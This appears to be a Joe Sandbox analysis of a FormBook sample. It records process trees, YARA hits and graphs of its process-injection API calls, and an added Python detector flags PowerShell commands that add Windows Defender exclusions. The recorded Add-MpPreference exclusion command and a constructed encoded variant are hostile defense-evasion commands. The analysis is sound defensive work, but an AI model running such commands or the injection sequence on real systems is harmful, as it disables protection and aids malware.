                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe"
                                                                                                                    Imagebase:0xbe0000
                                                                                                                    File size:433'152 bytes
                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true
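The command line recorded for Target ID 3 above (powershell.exe Add-MpPreference -ExclusionPath pointing at the dropped sample) is the sample excluding itself from Windows Defender scanning. The Python script below is an added example, not part of the Joe Sandbox report, showing how a process-creation event feed can be checked for this behaviour. It matches the plain form seen here and also unwraps -EncodedCommand arguments (PowerShell expects base64 of UTF-16LE text), so the same rule catches the encoded variant. The event records are constructed; the first reuses the command line from the report, the abbreviation list for -EncodedCommand is an assumption covering the common short forms.

```python
"""Flag PowerShell command lines that add Windows Defender exclusions.

Added example; not part of the Joe Sandbox report. Matches the plain
Add-MpPreference -ExclusionPath invocation recorded in the report and also
decodes -EncodedCommand payloads (base64 of UTF-16LE). Events are constructed.
"""
import base64
import re

# Cmdlets and parameters that change Defender's exclusion lists.
CMDLET_RE = re.compile(r"\b(Add|Set)-MpPreference\b", re.IGNORECASE)
EXCLUSION_RE = re.compile(r"-Exclusion(Path|Process|Extension|IpAddress)\b", re.IGNORECASE)
# -e, -ec, -enc, -EncodedCommand ... followed by a base64 argument (assumption: prefix forms).
ENCODED_RE = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand script, or '' if none is present."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def defender_exclusion_added(cmdline: str) -> dict:
    """Inspect one command line; describe the exclusion change or return {}."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + " " + decoded          # scan visible and decoded text together
    cmdlet = CMDLET_RE.search(text)
    param = EXCLUSION_RE.search(text)
    if not (cmdlet and param):
        return {}
    return {"cmdlet": cmdlet.group(0), "parameter": param.group(0), "encoded": bool(decoded)}


def encode_ps(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


def scan(events: list) -> list:
    """Return (pid, finding) for events whose command line adds a Defender exclusion."""
    return [(e["pid"], f) for e in events if (f := defender_exclusion_added(e["cmdline"]))]


# Constructed process-creation events. Event 1 reuses the command line from the report.
EVENTS = [
    {"pid": 1, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe"'},
    {"pid": 2, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + encode_ps(r'Set-MpPreference -ExclusionProcess "C:\Users\Public\a.exe"')},
    {"pid": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile Get-MpPreference"},   # read-only, must not fire
]

if __name__ == "__main__":
    for pid, finding in scan(EVENTS):
        print(f"pid {pid}: {finding['cmdlet']} {finding['parameter']} encoded={finding['encoded']}")
```

Both the plain and the encoded event are reported; the Get-MpPreference event is not. On a real host the same check should be applied to the decoded text of any script block logs as well, since an exclusion can equally be added from a .ps1 file with no telling command line.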

                                                                                                                    Target ID:4
                                                                                                                    Start time:05:35:33
                                                                                                                    Start date:24/12/2024
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:5
                                                                                                                    Start time:05:35:33
                                                                                                                    Start date:24/12/2024
                                                                                                                    Path:C:\Users\user\Desktop\SW_48912.scr.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\SW_48912.scr.exe"
                                                                                                                    Imagebase:0x7a0000
                                                                                                                    File size:811'528 bytes
                                                                                                                    MD5 hash:B4C5A379D38312666805D0D33E2801B7
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2040290934.0000000001250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2041411490.00000000018E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:8
                                                                                                                    Start time:05:35:36
                                                                                                                    Start date:24/12/2024
                                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                    Imagebase:0x7ff693ab0000
                                                                                                                    File size:496'640 bytes
                                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:9
                                                                                                                    Start time:05:35:40
                                                                                                                    Start date:24/12/2024
                                                                                                                    Path:C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe"
                                                                                                                    Imagebase:0x700000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3539428414.0000000002BF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:10
                                                                                                                    Start time:05:35:42
                                                                                                                    Start date:24/12/2024
                                                                                                                    Path:C:\Windows\SysWOW64\sdchange.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\SysWOW64\sdchange.exe"
                                                                                                                    Imagebase:0x6f0000
                                                                                                                    File size:40'960 bytes
                                                                                                                    MD5 hash:8E93B557363D8400A8B9F2D70AEB222B
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3539313098.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3539365806.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:false

                                                                                                                    Target ID:11
                                                                                                                    Start time:05:35:55
                                                                                                                    Start date:24/12/2024
                                                                                                                    Path:C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe"
                                                                                                                    Imagebase:0x700000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3540931534.0000000005440000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:12
                                                                                                                    Start time:05:36:07
                                                                                                                    Start date:24/12/2024
                                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                    Imagebase:0x7ff6bf500000
                                                                                                                    File size:676'768 bytes
                                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true


                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:10.6%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:0.8%
                                                                                                                      Total number of Nodes:381
                                                                                                                      Total number of Limit Nodes:27
                                                                                                                      execution_graph 40231 6f83f18 40236 6f82df4 40231->40236 40234 6f80424 OleInitialize 40235 6f83f51 40234->40235 40237 6f82dff 40236->40237 40238 6f83f3b 40237->40238 40240 6f83b88 GetActiveWindow GetFocus 40237->40240 40238->40234 40240->40238 40122 2394668 40123 2394672 40122->40123 40127 2394758 40122->40127 40132 2393e40 40123->40132 40125 239468d 40128 239477d 40127->40128 40138 2394868 40128->40138 40142 2394858 40128->40142 40133 2393e4b 40132->40133 40150 2395e50 40133->40150 40135 239739a 40154 23972e8 40135->40154 40137 23973b4 40137->40125 40140 239488f 40138->40140 40139 239496c 40139->40139 40140->40139 40146 23944c4 40140->40146 40143 2394868 40142->40143 40144 239496c 40143->40144 40145 23944c4 CreateActCtxA 40143->40145 40145->40144 40147 23958f8 CreateActCtxA 40146->40147 40149 23959bb 40147->40149 40149->40149 40151 2395e5b 40150->40151 40152 23972e8 GetFocus 40151->40152 40153 239783f 40152->40153 40153->40135 40155 23972f3 40154->40155 40158 2397348 40155->40158 40157 23979bd 40157->40137 40159 2397353 40158->40159 40162 2397720 40159->40162 40161 2397a9a 40161->40157 40163 239772b 40162->40163 40166 2397750 40163->40166 40165 2397b8d 40165->40161 40167 239775b 40166->40167 40168 2399129 40167->40168 40170 239d890 40167->40170 40168->40165 40171 239d8b1 40170->40171 40172 239d8d5 40171->40172 40174 239da40 40171->40174 40172->40168 40176 239da4d 40174->40176 40175 239da87 40175->40172 40176->40175 40178 239d378 40176->40178 40179 239d383 40178->40179 40180 239e398 40179->40180 40182 239d4a4 40179->40182 40183 239d4af 40182->40183 40184 2397750 GetFocus 40183->40184 40185 239e407 40184->40185 40188 239e888 40185->40188 40186 239e416 40186->40180 40189 239e8b6 40188->40189 40190 239e4e0 GetFocus 40189->40190 40191 239e8df 40189->40191 40190->40191 40241 239db58 40242 239db9e GetCurrentProcess 40241->40242 40244 239dbe9 40242->40244 
40245 239dbf0 GetCurrentThread 40242->40245 40244->40245 40246 239dc2d GetCurrentProcess 40245->40246 40247 239dc26 40245->40247 40248 239dc63 GetCurrentThreadId 40246->40248 40247->40246 40250 239dcbc 40248->40250 39795 6f8305e 39798 6f82c08 39795->39798 39799 6f82c13 39798->39799 39803 6f83880 39799->39803 39809 6f83870 39799->39809 39800 6f8306b 39804 6f838cf GetCurrentThreadId 39803->39804 39806 6f83915 39804->39806 39815 6f82d64 39806->39815 39810 6f838cf GetCurrentThreadId 39809->39810 39812 6f83915 39810->39812 39813 6f82d64 EnumThreadWindows 39812->39813 39814 6f83950 39813->39814 39814->39800 39817 6f83970 EnumThreadWindows 39815->39817 39818 6f83950 39817->39818 39818->39800 40192 66780b0 40193 66780ea 40192->40193 40194 6678166 40193->40194 40195 667817b 40193->40195 40200 667773c 40194->40200 40197 667773c 3 API calls 40195->40197 40199 667818a 40197->40199 40202 6677747 40200->40202 40201 6678171 40202->40201 40205 6678ac1 40202->40205 40212 6678ad0 40202->40212 40206 6678ad0 40205->40206 40218 6677784 40206->40218 40209 6678af7 40209->40201 40210 6678b20 CreateIconFromResourceEx 40211 6678b9e 40210->40211 40211->40201 40213 6677784 CreateIconFromResourceEx 40212->40213 40214 6678aea 40213->40214 40215 6678af7 40214->40215 40216 6678b20 CreateIconFromResourceEx 40214->40216 40215->40201 40217 6678b9e 40216->40217 40217->40201 40219 6678b20 CreateIconFromResourceEx 40218->40219 40220 6678aea 40219->40220 40220->40209 40220->40210 39777 6f82ff0 39780 6f80424 39777->39780 39779 6f83021 39781 6f8042f 39780->39781 39783 6f830f1 39781->39783 39784 6f82cdc 39781->39784 39783->39779 39786 6f82ce7 39784->39786 39785 6f8340b 39785->39783 39786->39785 39788 6f82cf8 39786->39788 39789 6f83440 OleInitialize 39788->39789 39790 6f834a4 39789->39790 39790->39785 39791 6f84160 PostMessageW 39792 6f841cc 39791->39792 39793 239dda0 DuplicateHandle 39794 239de36 39793->39794 40251 239bac0 40252 239bb08 GetModuleHandleW 40251->40252 40253 239bb02 40251->40253 40254 239bb35 
40252->40254 40253->40252 39819 6f821c3 39820 6f82190 39819->39820 39821 6f8225f 39819->39821 39821->39820 39824 6f82448 39821->39824 39830 6f82438 39821->39830 39825 6f824ab 39824->39825 39826 6f825bd GetActiveWindow 39825->39826 39828 6f825eb 39825->39828 39829 6f82689 39825->39829 39826->39828 39828->39829 39836 6f801b8 39828->39836 39829->39820 39831 6f824ab 39830->39831 39832 6f825bd GetActiveWindow 39831->39832 39834 6f825eb 39831->39834 39835 6f82689 39831->39835 39832->39834 39833 6f801b8 MessageBoxW 39833->39835 39834->39833 39834->39835 39835->39820 39837 6f83db8 MessageBoxW 39836->39837 39839 6f83e44 39837->39839 39839->39829 39840 6f81a33 39841 6f81991 39840->39841 39842 6f819dd 39841->39842 39843 6f81aea 39841->39843 39844 6f819b6 39841->39844 39842->39844 39914 6f82318 39842->39914 39919 6f82308 39842->39919 39843->39844 39850 6f84fc8 39843->39850 39871 6f85018 39843->39871 39893 6f84fb8 39843->39893 39851 6f84fd0 39850->39851 39863 6f84fea 39851->39863 39924 6f85bb9 39851->39924 39928 6f853a7 39851->39928 39938 6f854a4 39851->39938 39945 6f85523 39851->39945 39952 6f856e0 39851->39952 39959 6f8590d 39851->39959 39964 6f8554c 39851->39964 39968 6f8570b 39851->39968 39975 6f85996 39851->39975 39981 6f853f5 39851->39981 39991 6f85833 39851->39991 39996 6f854b3 39851->39996 40005 6f85ab2 39851->40005 40012 6f85771 39851->40012 40016 6f853d0 39851->40016 40027 6f85670 39851->40027 40034 6f8547f 39851->40034 40041 6f859fb 39851->40041 39863->39844 39872 6f84fd0 39871->39872 39873 6f85026 39871->39873 39874 6f85bb9 2 API calls 39872->39874 39875 6f859fb 2 API calls 39872->39875 39876 6f8547f 4 API calls 39872->39876 39877 6f85670 4 API calls 39872->39877 39878 6f853d0 6 API calls 39872->39878 39879 6f85771 2 API calls 39872->39879 39880 6f85ab2 4 API calls 39872->39880 39881 6f854b3 6 API calls 39872->39881 39882 6f85833 2 API calls 39872->39882 39883 6f853f5 6 API calls 39872->39883 39884 6f85996 2 API calls 39872->39884 39885 6f84fea 39872->39885 39886 
6f8570b 4 API calls 39872->39886 39887 6f8554c 2 API calls 39872->39887 39888 6f8590d 2 API calls 39872->39888 39889 6f856e0 4 API calls 39872->39889 39890 6f85523 4 API calls 39872->39890 39891 6f854a4 4 API calls 39872->39891 39892 6f853a7 6 API calls 39872->39892 39873->39844 39874->39885 39875->39885 39876->39885 39877->39885 39878->39885 39879->39885 39880->39885 39881->39885 39882->39885 39883->39885 39884->39885 39885->39844 39886->39885 39887->39885 39888->39885 39889->39885 39890->39885 39891->39885 39892->39885 39894 6f84fd0 39893->39894 39895 6f84fea 39894->39895 39896 6f85bb9 2 API calls 39894->39896 39897 6f859fb 2 API calls 39894->39897 39898 6f8547f 4 API calls 39894->39898 39899 6f85670 4 API calls 39894->39899 39900 6f853d0 6 API calls 39894->39900 39901 6f85771 2 API calls 39894->39901 39902 6f85ab2 4 API calls 39894->39902 39903 6f854b3 6 API calls 39894->39903 39904 6f85833 2 API calls 39894->39904 39905 6f853f5 6 API calls 39894->39905 39906 6f85996 2 API calls 39894->39906 39907 6f8570b 4 API calls 39894->39907 39908 6f8554c 2 API calls 39894->39908 39909 6f8590d 2 API calls 39894->39909 39910 6f856e0 4 API calls 39894->39910 39911 6f85523 4 API calls 39894->39911 39912 6f854a4 4 API calls 39894->39912 39913 6f853a7 6 API calls 39894->39913 39895->39844 39896->39895 39897->39895 39898->39895 39899->39895 39900->39895 39901->39895 39902->39895 39903->39895 39904->39895 39905->39895 39906->39895 39907->39895 39908->39895 39909->39895 39910->39895 39911->39895 39912->39895 39913->39895 39915 6f8232c 39914->39915 40103 6f823f8 39915->40103 40109 6f82389 39915->40109 39916 6f82356 39916->39844 39920 6f8232c 39919->39920 39922 6f823f8 3 API calls 39920->39922 39923 6f82389 3 API calls 39920->39923 39921 6f82356 39921->39844 39922->39921 39923->39921 40045 6f80df8 39924->40045 40049 6f80df0 39924->40049 39925 6f85bd7 39929 6f853b1 39928->39929 39930 6f8542f 39929->39930 40053 6f81578 39929->40053 40057 6f8156d 39929->40057 39930->39863 39931 6f8549d 
39930->39931 40061 6f861b8 39930->40061 40066 6f861a8 39930->40066 40071 6f808e1 39930->40071 40075 6f808e8 39930->40075 39931->39863 39940 6f8548b 39938->39940 39939 6f8549d 39939->39863 39940->39863 39940->39939 39941 6f808e8 Wow64SetThreadContext 39940->39941 39942 6f808e1 Wow64SetThreadContext 39940->39942 39943 6f861b8 2 API calls 39940->39943 39944 6f861a8 2 API calls 39940->39944 39941->39940 39942->39940 39943->39940 39944->39940 39947 6f8548b 39945->39947 39946 6f8549d 39946->39863 39947->39863 39947->39946 39948 6f808e8 Wow64SetThreadContext 39947->39948 39949 6f808e1 Wow64SetThreadContext 39947->39949 39950 6f861b8 2 API calls 39947->39950 39951 6f861a8 2 API calls 39947->39951 39948->39947 39949->39947 39950->39947 39951->39947 39954 6f8548b 39952->39954 39953 6f8549d 39953->39863 39954->39863 39954->39953 39955 6f808e8 Wow64SetThreadContext 39954->39955 39956 6f808e1 Wow64SetThreadContext 39954->39956 39957 6f861b8 2 API calls 39954->39957 39958 6f861a8 2 API calls 39954->39958 39955->39954 39956->39954 39957->39954 39958->39954 39960 6f8591b 39959->39960 40087 6f812e8 39960->40087 40091 6f812f0 39960->40091 39961 6f85cfe 40095 6f813d9 39964->40095 40099 6f813e0 39964->40099 39965 6f8556e 39965->39863 39969 6f8548b 39968->39969 39969->39863 39970 6f8549d 39969->39970 39971 6f808e8 Wow64SetThreadContext 39969->39971 39972 6f808e1 Wow64SetThreadContext 39969->39972 39973 6f861b8 2 API calls 39969->39973 39974 6f861a8 2 API calls 39969->39974 39970->39863 39971->39969 39972->39969 39973->39969 39974->39969 39976 6f8599a 39975->39976 39979 6f812e8 WriteProcessMemory 39975->39979 39980 6f812f0 WriteProcessMemory 39975->39980 39977 6f812e8 WriteProcessMemory 39976->39977 39978 6f812f0 WriteProcessMemory 39976->39978 39977->39976 39978->39976 39979->39976 39980->39976 39982 6f853fb 39981->39982 39985 6f81578 CreateProcessA 39982->39985 39986 6f8156d CreateProcessA 39982->39986 39983 6f8549d 39983->39863 39984 6f8542f 39984->39863 39984->39983 39987 6f808e8 
Wow64SetThreadContext 39984->39987 39988 6f808e1 Wow64SetThreadContext 39984->39988 39989 6f861b8 2 API calls 39984->39989 39990 6f861a8 2 API calls 39984->39990 39985->39984 39986->39984 39987->39984 39988->39984 39989->39984 39990->39984 39992 6f8590e 39991->39992 39994 6f812e8 WriteProcessMemory 39992->39994 39995 6f812f0 WriteProcessMemory 39992->39995 39993 6f85cfe 39994->39993 39995->39993 39999 6f812e8 WriteProcessMemory 39996->39999 40000 6f812f0 WriteProcessMemory 39996->40000 39997 6f8548b 39997->39863 39998 6f8549d 39997->39998 40001 6f808e8 Wow64SetThreadContext 39997->40001 40002 6f808e1 Wow64SetThreadContext 39997->40002 40003 6f861b8 2 API calls 39997->40003 40004 6f861a8 2 API calls 39997->40004 39998->39863 39999->39997 40000->39997 40001->39997 40002->39997 40003->39997 40004->39997 40006 6f8548b 40005->40006 40006->39863 40007 6f8549d 40006->40007 40008 6f808e8 Wow64SetThreadContext 40006->40008 40009 6f808e1 Wow64SetThreadContext 40006->40009 40010 6f861b8 2 API calls 40006->40010 40011 6f861a8 2 API calls 40006->40011 40007->39863 40008->40006 40009->40006 40010->40006 40011->40006 40014 6f808e8 Wow64SetThreadContext 40012->40014 40015 6f808e1 Wow64SetThreadContext 40012->40015 40013 6f8578b 40013->39863 40014->40013 40015->40013 40018 6f853a7 40016->40018 40017 6f85f46 40018->40017 40020 6f8542f 40018->40020 40021 6f81578 CreateProcessA 40018->40021 40022 6f8156d CreateProcessA 40018->40022 40019 6f8549d 40019->39863 40020->39863 40020->40019 40023 6f808e8 Wow64SetThreadContext 40020->40023 40024 6f808e1 Wow64SetThreadContext 40020->40024 40025 6f861b8 2 API calls 40020->40025 40026 6f861a8 2 API calls 40020->40026 40021->40020 40022->40020 40023->40020 40024->40020 40025->40020 40026->40020 40028 6f8548b 40027->40028 40028->39863 40028->40027 40029 6f8549d 40028->40029 40030 6f861b8 2 API calls 40028->40030 40031 6f861a8 2 API calls 40028->40031 40032 6f808e8 Wow64SetThreadContext 40028->40032 40033 6f808e1 Wow64SetThreadContext 40028->40033 
[Control-flow graph (continued from the previous entry): edge list for basic blocks 6f80831-6f861e0, with calls to Wow64SetThreadContext, WriteProcessMemory, VirtualAllocEx, CreateProcessA, ResumeThread and ReadProcessMemory; the rendered graph is not reproducible in text]

Control-flow Graph

• Executed
• Not Executed
[Graph for the function at 667773c: basic blocks 667773c-6678a74, with calls to 667774c, 6677758, 6677764, 6677774, 6678ac1 and 6678ad0; the rendered graph is not reproducible in text]
Strings
Memory Dump Source
• Source File: 00000000.00000002.1930753174.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6670000_SW_48912.jbxd
Similarity
• API ID:
• String ID: Hhq$Hhq$Hhq$Hhq$Hhq
• API String ID: 0-1427472961
• Opcode ID: 00bdc606a597cd46484673855105ac2feb7415d1c08415d5d71ccbe77cfbbb34
• Instruction ID: c22f88fc9fffd73c11e1f72a6b5efbc6c3caf7c871f9d1c38b3032c42006dab7
• Opcode Fuzzy Hash: 00bdc606a597cd46484673855105ac2feb7415d1c08415d5d71ccbe77cfbbb34
• Instruction Fuzzy Hash: A0324070E002548FDB94DFA9C85479EBBF2AF88300F1485ADD50AAB399DB349D45CF91
Memory Dump Source
• Source File: 00000000.00000002.1930753174.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6670000_SW_48912.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 828aa8f7a817c65a4255979b224074b3570d91ce93b198a5842b279a63e4bc8c
• Instruction ID: f238fb4e5e3a1f1b4f377cf55b9be1e4391a2b55873eae1b3a69c622c6b37458
• Opcode Fuzzy Hash: 828aa8f7a817c65a4255979b224074b3570d91ce93b198a5842b279a63e4bc8c
• Instruction Fuzzy Hash: 5FC14B30E002589FDF94CFA9C984799BBB2EF88310F14C1A9D459AB255EB74AD85CF90

Control-flow Graph

• Executed
• Not Executed
[Graph for the function at 6b84b70: basic blocks 6b84b70-6b84cbf, no API calls; the rendered graph is not reproducible in text]
Strings
Memory Dump Source
• Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
Similarity
• API ID:
• String ID: "$8hq$8hq$LRdq$LRdq$LRdq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
• API String ID: 0-1080938503
• Opcode ID: 15ccb1863eb19e7d6b660baae0db5fa9e19ca8a26b2b0aadf260abff3d3b49cb
• Instruction ID: 200eb42402a5eb9324fc1dfe4d7932b5af248597644e3617d4d089ab6afc3cd1
• Opcode Fuzzy Hash: 15ccb1863eb19e7d6b660baae0db5fa9e19ca8a26b2b0aadf260abff3d3b49cb
• Instruction Fuzzy Hash: C631F4B0B102059FD394EB69D80476A7BF6EB85305F1480FAD115CB392EB35CC49CBA1

Control-flow Graph

• Executed
• Not Executed
[Graph for the function at 239db58: basic blocks 239db58-239dd25, with calls to GetCurrentProcess, GetCurrentThread and GetCurrentThreadId; the rendered graph is not reproducible in text]
APIs
• GetCurrentProcess.KERNEL32 ref: 0239DBD6
• GetCurrentThread.KERNEL32 ref: 0239DC13
• GetCurrentProcess.KERNEL32 ref: 0239DC50
• GetCurrentThreadId.KERNEL32 ref: 0239DCA9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1920811333.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2390000_SW_48912.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID: `g
• API String ID: 2063062207-2645773341
• Opcode ID: 4111e9bd3a52045749982da4850a941e6cb0a9c5b4a82947831536b649ab5d17
• Instruction ID: afea01a601962a4c6fce9d67bb4a81a90749a55d0209cdee57f57d538cf3388d
• Opcode Fuzzy Hash: 4111e9bd3a52045749982da4850a941e6cb0a9c5b4a82947831536b649ab5d17
• Instruction Fuzzy Hash: A25178B09003498FDB54EFA9D548B9EBBF1EF88314F20845DE409A7360DB74A944CF65

Control-flow Graph

• Executed
• Not Executed
[Graph for the function at 6f82448: basic blocks 6f82448-6f82919, with a call to GetActiveWindow and calls to 6f82b8f, 6f801b8 and 6f83ee1; the rendered graph is not reproducible in text]
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
Similarity
• API ID: ActiveWindow
• String ID: Hhq$Hhq
• API String ID: 2558294473-2450388649
• Opcode ID: c93c1c63b408eb2e72970594340a22e49ef66bb5e95560fcd07ed2734461091a
• Instruction ID: 39e49518aec25ddc0035cbdee49418a421cee9ceb1ac8037dc99a4e3cfcd9085
• Opcode Fuzzy Hash: c93c1c63b408eb2e72970594340a22e49ef66bb5e95560fcd07ed2734461091a
• Instruction Fuzzy Hash: 7EB1AE74F003549FCB48EFB8946476E7AA2EFC8340F548469D606AB394DF389D42CBA1

Control-flow Graph

• Executed
• Not Executed
[Graph for the function entered at 6b83bf9: basic blocks 6b83b8a-6b83d3b, no API calls; the rendered graph is not reproducible in text]
Strings
Memory Dump Source
• Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
Similarity
• API ID:
• String ID: LRdq$$dq$$dq$$dq
• API String ID: 0-3738214926
• Opcode ID: 6add128fc3969c76f68954172fb0249779b6cbcb306481bd7a8312fe7b62fa0b
• Instruction ID: 65c56642a784d7dfb83482b172d3bde0f7098383cc4e8cc7855af71bf784ed66
• Opcode Fuzzy Hash: 6add128fc3969c76f68954172fb0249779b6cbcb306481bd7a8312fe7b62fa0b
• Instruction Fuzzy Hash: A941D1F0B44219DFEB90AFA8D85477EB7F1FB44B10F1081AAE902AB2C1C6748941CB91

Control-flow Graph

• Executed
• Not Executed
[Graph for the function entered at 6b83cd3: basic blocks 6b83b8a-6b83d3b, no API calls; the rendered graph is not reproducible in text]
Strings
Memory Dump Source
• Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
Similarity
• API ID:
• String ID: LRdq$$dq$$dq
• API String ID: 0-1571560672
